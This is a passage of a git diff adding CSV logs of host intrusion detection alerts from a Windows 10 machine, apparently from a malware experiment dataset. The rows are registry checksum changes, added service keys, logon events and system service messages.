system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_29f1e' was added. +" +"Apr 4, 2020 @ 16:19:07.291",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:19:07.307",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_29f1e' was added. +" +"Apr 4, 2020 @ 16:19:17.307",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:19:17.323",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_29f1e' was added. +" +"Apr 4, 2020 @ 16:20:28.980",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'", +"Apr 4, 2020 @ 16:20:33.683",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)", +"Apr 4, 2020 @ 16:12:01.754",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 16:12:31.145",3,"Windows Logon Success", +"Apr 4, 2020 @ 16:13:33.449",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 16:14:08.927",3,"Windows Logon Success", +"Apr 4, 2020 @ 16:14:27.686",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 16:16:28.546",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'." +"Apr 4, 2020 @ 16:16:29.194",3,"Windows Logon Success", +"Apr 4, 2020 @ 16:16:30.447",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 16:16:30.490",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 16:16:37.784",3,"Windows Logon Success", +"Apr 4, 2020 @ 16:16:38.210",3,"The database engine is starting a new instance", +"Apr 4, 2020 @ 16:16:38.428",3,"The database engine attached a database", +"Apr 4, 2020 @ 16:16:38.976",3,"The Windows Search Service started", +"Apr 4, 2020 @ 16:16:45.210",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 16:16:45.229",3,"Windows Workstation Logon Success", +"Apr 4, 2020 @ 16:16:45.258",3,"Windows User Logoff", +"Apr 4, 2020 @ 16:16:45.281",3,"Windows User Logoff", +"Apr 4, 2020 @ 16:16:48.601",3,"Windows Logon Success", +"Apr 4, 2020 @ 16:17:12.945",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 16:17:58.852",3,"Windows Logon Success", +"Apr 4, 2020 @ 16:18:29.248",3,"Windows Logon Success", +"Apr 4, 2020 @ 16:18:58.791",3,"Software Protection service scheduled successfully", +"Apr 4, 2020 @ 16:20:33.714",3,"Service startup type was changed", diff --git a/data/MW_14_HIDS_2.csv b/data/MW_14_HIDS_2.csv new file mode 100644 index 0000000..0728296 --- /dev/null +++ b/data/MW_14_HIDS_2.csv @@ -0,0 +1,1393 @@ +timestamp,"rule.level","rule.description","full_log","data.win.system.message" +"Apr 24, 2020 @ 13:13:36.184",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: 'cf3754ae4c53bb01ca8f4706679eb2c1' +New md5sum is : '185d612f78fce1526ce008c1931abcc6' +Old sha1sum was: 'e6b6ed8af81664d49dc704d5d1fe570c44b0494f' +New sha1sum is : '7a7004354744dcd7886dc8307a1634cc3a0e059c' +", +"Apr 24, 2020 @ 13:13:36.169",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '6484aaf5ea7798f1bf32f0804fa1d0bb' +New md5sum is : '100ead94668944d84b2a1144423fcb73' +Old sha1sum was: 'fc8cbbf8be08cb003f070ba6949ee1944ad70d2d' +New sha1sum is : '455e697a971d8f61c574214108cb1d5263461398' +", +"Apr 24, 2020 @ 13:13:34.825",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows' checksum changed. +Old md5sum was: '49574a9da5b73510ecb8125c7786d037' +New md5sum is : '4d6e359f48b4d661879fa30d266022bd' +Old sha1sum was: 'fc3c9a4be6b806a974693af1dc528845db7631da' +New sha1sum is : '36dbf8e97699b0ca2ccc6e1503bfdfbfc3494986' +", +"Apr 24, 2020 @ 13:13:32.732",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_69cbe' was added. +", +"Apr 24, 2020 @ 13:13:32.716",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:13:25.685",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'f3f5f5fdd6f39cf62e69610c4b6eeae1' +New md5sum is : '29f6279048392e596b289f171bfe2117' +Old sha1sum was: '260824863a974bdbdbfd3edb7f0e7b125a50d50d' +New sha1sum is : 'fb61655b893457d5b89950bcb8e574fb0c2b2ee0' +", +"Apr 24, 2020 @ 13:13:25.670",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '1ae2be33276cc123ae315374ecb4bbdb' +New md5sum is : '6802c32dd7e97c204d9b4a5103edb8fd' +Old sha1sum was: '70a0b632322092d49ef0d93a8084c6c74562b3dd' +New sha1sum is : 'a3026a7f639946e032b0592d9980b64bf802ba17' +", +"Apr 24, 2020 @ 13:13:25.013",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: 'ee77ddbee1ed560d6b349650e8349414' +New md5sum is : '711af8bef5843e2b181a65e02f7ec4e7' +Old sha1sum was: '6c5f559746b6a7a4faf287183a528aa3790a9772' +New sha1sum is : '38360c17547cafecdf62b6be07a2e1aff8bca9dd' +", +"Apr 24, 2020 @ 13:13:21.170",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_69cbe' was added. +", +"Apr 24, 2020 @ 13:13:21.153",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:13:19.997",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_69cbe' was added. +", +"Apr 24, 2020 @ 13:13:19.981",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:13:17.342",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: '5b5e36f557a71edd65caa6a11cda9191' +New md5sum is : 'a5e73c9f12ca5ca1a2e91341b6d7e1e1' +Old sha1sum was: '0763b6960462085ba4b95f8dd74de49818cad40f' +New sha1sum is : 'ddad54675629131da3047b42c43628bd747e5262' +", +"Apr 24, 2020 @ 13:13:13.496",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: 'b7992042185fc6ec85e366e31893c993' +New md5sum is : '106c676c812191a74d1c845f04603231' +Old sha1sum was: '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +New sha1sum is : '935b4cfc84744b913c948f1140563c880fa44307' +", +"Apr 24, 2020 @ 13:13:11.341",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: 'dc9f9e3fba782230828c1350ebdd6327' +New md5sum is : 'abe41aab895e504aa874d1b2b8792e94' +Old sha1sum was: 'df82c4e7b328c25ab2a829fbb36079904d347a00' +New sha1sum is : '9daf66238ba18f6f989346a0d4ba77fa2e949329' +", +"Apr 24, 2020 @ 13:13:11.325",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '0447d0d52ee5a830c05fbee07043f258' +New md5sum is : 'b53bf2f3f61682c350be645945192116' +Old sha1sum was: 'c52421ca8edc9b41a95e22c437b67f0f199f288a' +New sha1sum is : 'b5f04a7f7762c384b95b4d56b16e28e5cc863241' +", +"Apr 24, 2020 @ 13:13:07.545",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T13:10:04Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 13:13:06.669",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'fa742e572a0ab3ad838cdc36f548a2e7' +New md5sum is : 'f7e3ede101883838642b014adb830ba3' +Old sha1sum was: '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +New sha1sum is : '77ead1a75e96863caf4602afa49e9fabf7cf3623' +", +"Apr 24, 2020 @ 13:13:04.575",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_69cbe' was added. +", +"Apr 24, 2020 @ 13:13:04.559",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:13:04.079",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_69cbe' was added. +", +"Apr 24, 2020 @ 13:13:04.068",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:13:02.373",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_69cbe' was added. +", +"Apr 24, 2020 @ 13:13:02.356",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:12:54.982",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_69cbe' was added. +", +"Apr 24, 2020 @ 13:12:54.951",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_69cbe\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 13:12:54.936",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:12:50.935",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'b85132a0856accdaadf483c328604620' +New md5sum is : 'a635cc7d63339ac3075b507a97dc0727' +Old sha1sum was: '80153a47c9a0dbd7178a3eb90d1718ccd39c8805' +New sha1sum is : '2ab013a07ae2703176febea130ae9ddc53ac1615' +", +"Apr 24, 2020 @ 13:12:45.389",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: 'ae9643074ec7a4ef81bb63a482e527c9' +New md5sum is : '1c6e2319780c0264f929f3c3433add82' +Old sha1sum was: 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +New sha1sum is : 'f924403989ef2de336c156640b73fb0db5024306' +", +"Apr 24, 2020 @ 13:12:39.514",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:12:36.107",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: '82b30eaa417a603e1be4cf6a8e7d1780' +New md5sum is : '6073decf84a173eeedd11a3559b16ec1' +Old sha1sum was: '06cff1d46c183923be141be79d7942caf890168a' +New sha1sum is : 'f18af090c617e4708f33242930b7538c92479f32' +", +"Apr 24, 2020 @ 13:12:29.889",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '0f373677e8420ba91bd16d2b118fd873' +New md5sum is : 'cce358497fdfdde2833a161f70210463' +Old sha1sum was: '7cfdcf480a3cb8adf138d3f5deabf3f648b63dee' +New sha1sum is : 'd63f655305d47c49eeeee9df2ad94c7fd2ec28a2' +", +"Apr 24, 2020 @ 13:12:28.523",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_69cbe' was added. +", +"Apr 24, 2020 @ 13:12:28.500",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:12:28.421",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_69cbe' was added. +", +"Apr 24, 2020 @ 13:12:28.399",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:12:28.120",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_69cbe' was added. +", +"Apr 24, 2020 @ 13:12:28.098",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:12:27.498",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_69cbe' was added. +", +"Apr 24, 2020 @ 13:12:27.480",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:12:27.322",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_69cbe' was added. +", +"Apr 24, 2020 @ 13:12:27.305",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:12:25.953",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_69cbe' was added. +", +"Apr 24, 2020 @ 13:12:25.935",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:12:25.781",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_69cbe' was added. +", +"Apr 24, 2020 @ 13:12:25.764",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:12:25.693",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_69cbe' was added. +", +"Apr 24, 2020 @ 13:12:25.675",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:12:23.967",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:12:23.310",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_69cbe' was added. +", +"Apr 24, 2020 @ 13:12:23.297",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_69cbe\TriggerInfo\4' was added. +", +"Apr 24, 2020 @ 13:12:23.275",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_69cbe\TriggerInfo\3' was added. +", +"Apr 24, 2020 @ 13:12:23.250",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_69cbe\TriggerInfo\2' was added. +", +"Apr 24, 2020 @ 13:12:23.232",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_69cbe\TriggerInfo\1' was added. +", +"Apr 24, 2020 @ 13:12:23.215",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_69cbe\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 13:12:23.211",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:12:22.107",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_69cbe' was added. +", +"Apr 24, 2020 @ 13:12:22.092",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:12:21.841",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: '423bc04012208584e3146b2b1e60cd7b' +New md5sum is : '9f95a12e467bbf352a90602d9f025d5d' +Old sha1sum was: 'b945526a2a2ba5f02dc034646d066b528e36b1ee' +New sha1sum is : 'c5c884aae620a6430070a4a03dc8d115ad37148f' +", +"Apr 24, 2020 @ 13:12:21.824",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '0605cdb24f1ff5338bc41392ba73d94f' +New md5sum is : 'a73a335588651cfda297cd10b7ebe55e' +Old sha1sum was: 'f486515c8d4c93497c80cacf50cdf5c398a099e9' +New sha1sum is : '36e61788f9f92ff546c43f33c5b94f4b7e4609ce' +", +"Apr 24, 2020 @ 13:12:21.795",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'f8747906b6607d91d1b84f1d1bcb8184' +New md5sum is : 'f90b0689dbdea07bf5bf46f391e73bca' +Old sha1sum was: 'f7fe1c2866d11ad676d8ebbefa88c1039f2a0af9' +New sha1sum is : '718d3adbe4f76654fbcafae76e4dc88b8a9b8325' +", +"Apr 24, 2020 @ 13:12:19.419",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_69cbe' was added. +", +"Apr 24, 2020 @ 13:12:19.403",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_69cbe\Security' was added. +", +"Apr 24, 2020 @ 13:12:18.733",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'bec7923af911bc42900a4d74cc4d4af4' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : '5456e9d4456d03fb3f15c7ac02d91333683f3043' +", +"Apr 24, 2020 @ 13:11:44.873",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T13:10:42Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 13:11:44.232",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'bec7923af911bc42900a4d74cc4d4af4' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : '5456e9d4456d03fb3f15c7ac02d91333683f3043' +", +"Apr 24, 2020 @ 13:11:20.703",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:11:17.159",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=UserLogon;SessionId=1""" +"Apr 24, 2020 @ 13:11:15.560",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Security\SAM' checksum changed. +Old md5sum was: '85a6f1b1286ecf20e01235e2d33ec25a' +New md5sum is : 'bbf5b60c1ec7b2d74e5edac3eade9c29' +Old sha1sum was: 'dc139d9e9ad39ee0dadd9b4f52db078581cfb394' +New sha1sum is : 'c51cca6db4d9b2f22e973c9b365f3237afa78444' +", +"Apr 24, 2020 @ 13:11:11.252",3,"The Windows Search Service started",,"""The Windows Search Service started. +""" +"Apr 24, 2020 @ 13:11:08.773",3,"The database engine attached a database",,"""SearchIndexer (4700,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). (Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000014:0067:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000010 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.035706 -0.035438 (1) WT +J(0) +M(C:0K, Fs:25, WS:36K # 0K, PF:32K # 0K, P:32K) +[3] 0.081260 -0.072404 (6) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:41, WS:124K # 0K, PF:144K # 0K, P:144K) +[4] 0.000147 +J(0) +[5] - +[6] - +[7] - +[8] 0.002874 -0.000787 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:52, WS:208K # 0K, PF:660K # 0K, P:660K) +[9] 0.194263 -0.000185 (5) CM -0.193760 (2) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:67, WS:268K # 0K, PF:256K # 128K, P:256K) +[10] 0.000223 -0.000101 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:11, WS:44K # 4K, PF:96K # 96K, P:96K) +[11] 0.000013 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 16K, PF:0K # 0K, P:0K) +[12] 0.000034 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.0 +J(0) +[14] 0.0 +J(0) +[15] 0.000004 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""" +"Apr 24, 2020 @ 13:11:06.322",3,"The database engine is starting a new instance",,"""SearchIndexer (4700,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""" +"Apr 24, 2020 @ 13:11:06.281",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a 